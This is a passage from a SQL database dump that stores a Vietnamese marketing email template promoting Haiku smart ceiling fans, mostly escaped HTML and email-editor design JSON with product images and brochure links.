transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-size: 14px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Too many emails?\\u00a0 <a rel=\\\"noopener\\\" href=\\\"%unsubscribe_url%\\\" target=\\\"_blank\\\"><span style=\\\"text-decoration: underline; font-size: 14px; line-height: 19.6px;\\\">Unsubscribe<\\/span><\\/a><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"');
INSERT INTO `tblma_emails` (`id`, `name`, `type`, `category`, `segment`, `published`, `language`, `description`, `addedfrom`, `dateadded`, `color`, `subject`, `email_template`, `from_name`, `from_address`, `reply_to_address`, `bcc_address`, `attachment`, `data_design`, `data_html`) VALUES
(6, 'Haiku - quạt trần thông minh đầu tiên trên thế giới (VN)', '', 1, 0, 1, 'vietnamese', '', 1, '2023-02-27 20:31:14', '#419008', 'Haiku - quạt trần thông minh đầu tiên trên thế giới', 9, 'Tổ chức đào tạo WIT - cung cấp quạt trần từ các hãng sản xuất quạt mát #1 thế giới', 'no-reply@hogiaphat.vn', 'sale@hogiaphat.vn', 'cskh@hogiaphat.vn', '2', '\"{\\\"counters\\\":{\\\"u_row\\\":8,\\\"u_column\\\":15,\\\"u_content_text\\\":7,\\\"u_content_image\\\":13,\\\"u_content_button\\\":5,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":3,\\\"u_content_heading\\\":6,\\\"u_content_text_deprecated\\\":1},\\\"body\\\":{\\\"id\\\":\\\"nY2UpNg7xs\\\",\\\"rows\\\":[{\\\"id\\\":\\\"CvMouKqZza\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"MIyWoeK0P3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wkMmc2BYL9\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 19px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677502368565-logo_baf.png\\\",\\\"width\\\":445,\\\"height\\\":224,\\\"maxWidth\\\":\\\"26%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"mWDZmdczN4\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 16px; line-height: 22.4px;\\\\\\\"><strong><span style=\\\\\\\"font-family: Montserrat, sans-serif; line-height: 22.4px;\\\\\\\">HAIKU - Qu\\u1ea1t tr\\u1ea7n cao c\\u1ea5p \\u0111\\u01b0\\u1ee3c thi\\u1ebft k\\u1ebf v\\u00e0 s\\u1ea3n xu\\u1ea5t t\\u1eeb Hoa K\\u1ef3.<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"gVPK2KUKnF\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 26px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503530290-haiku-fans-residential-0.png\\\",\\\"width\\\":2000,\\\"height\\\":1000},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"CEyDphcpQ6\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontSize\\\":\\\"20px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_1\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"Ki\\u1ec3u D\\u00e1ng Thi\\u1ebft K\\u1ebf Th\\u1ee7 C\\u00f4ng\\\"}},{\\\"id\\\":\\\"9BLYLfou98\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontSize\\\":\\\"35px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_2\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"Tho\\u1ea3i M\\u00e1i S\\u00e1ng T\\u1ea1o\\\"}},{\\\"id\\\":\\\"-K-i8ZxoiQ\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503040555-stock-templates1677136007974-haiku-finishes.jpg\\\",\\\"width\\\":1200,\\\"height\\\":1200},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_7\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"VyLcw40BDA\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h4\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"16px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_3\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"MANG \\u0110\\u1ebeN S\\u1ef0 TINH T\\u1ebe PHONG C\\u00c1CH CHO T\\u1eeaNG KH\\u00d4NG GIAN S\\u1ed0NG\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#017ed0\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"2G9uTxQqI5\\\",\\\"cells\\\":[1,1,1,1],\\\"columns\\\":[{\\\"id\\\":\\\"6ubno4Pego\\\",\\\"contents\\\":[{\\\"id\\\":\\\"H9oT6H7xXx\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/H-series.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#3AAEE0\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_2\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">HAIKU H SERIES<\\/span>\\\",\\\"calculatedWidth\\\":143,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_12\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"8PkZJyt_vH\\\",\\\"contents\\\":[{\\\"id\\\":\\\"jS1PqOS7Xl\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/I-series.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#e67e23\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">HAIKU I SERIES<\\/span>\\\",\\\"calculatedWidth\\\":137,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_13\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"6gueSe8f4h\\\",\\\"contents\\\":[{\\\"id\\\":\\\"jWq9lKAUVa\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/L-series.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#2dc26b\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_5\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">HAIKU L SERIES<\\/span>\\\",\\\"calculatedWidth\\\":130,\\\"calculatedHeight\\\":54},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"7_rSdc1TtT\\\",\\\"contents\\\":[{\\\"id\\\":\\\"x_22-LcpU4\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/cutsheet-haiku-en.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#843fa1\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_4\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">HAIKU OUTDOOR<\\/span>\\\",\\\"calculatedWidth\\\":130,\\\"calculatedHeight\\\":54},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_15\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"RYZiqC9Ge_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_8LBi9___H\\\",\\\"contents\\\":[{\\\"id\\\":\\\"_s7AkbMQ6N\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"28px 33px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\">Haiku \\u0111\\u00e3 gi\\u00e0nh \\u0111\\u01b0\\u1ee3c h\\u01a1n 75 gi\\u1ea3i th\\u01b0\\u1edfng c\\u00f4ng ngh\\u1ec7 v\\u00e0 thi\\u1ebft k\\u1ebf. Ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n hi\\u1ec7u qu\\u1ea3 nh\\u1ea5t theo ti\\u00eau chu\\u1ea9n ENERGY STAR\\u00ae, n\\u01a1i m\\u00e0 qu\\u1ea1t Haiku Fans \\u0111\\u00e3 chi\\u1ebfm t\\u1edbi 19 v\\u1ecb tr\\u00ed h\\u00e0ng \\u0111\\u1ea7u.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"-tv4jVob68\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677502718754-cambien_senseME.jpg\\\",\\\"width\\\":1621,\\\"height\\\":1292},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_4\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"Al64RPrqki\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontSize\\\":\\\"20px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_4\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>C\\u00d4NG NGH\\u1ec6 SENSEME\\u2122<\\/strong>\\\"}},{\\\"id\\\":\\\"3vM6it4cB4\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"28px 33px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\">B\\u1ed9 n\\u00e3o \\u0111\\u1eb1ng sau nh\\u1eefng chi\\u1ebfc qu\\u1ea1t tr\\u1ea7n th\\u00f4ng minh nh\\u1ea5t th\\u1ebf gi\\u1edbi, c\\u00f4ng ngh\\u1ec7 SenseMe\\u2122 \\u0111\\u01b0\\u1ee3c c\\u1ea5p b\\u1eb1ng s\\u00e1ng ch\\u1ebf, gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i t\\u1eeb m\\u1ecdi g\\u00f3c \\u0111\\u1ed9 s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"3XywiR4X-b\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677502936864-sen_1.png\\\",\\\"width\\\":900,\\\"height\\\":170},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_6\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"e-hJ3MnqLx\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503569736-bamboo-caramel.jpg\\\",\\\"width\\\":2000,\\\"height\\\":900},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_12\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\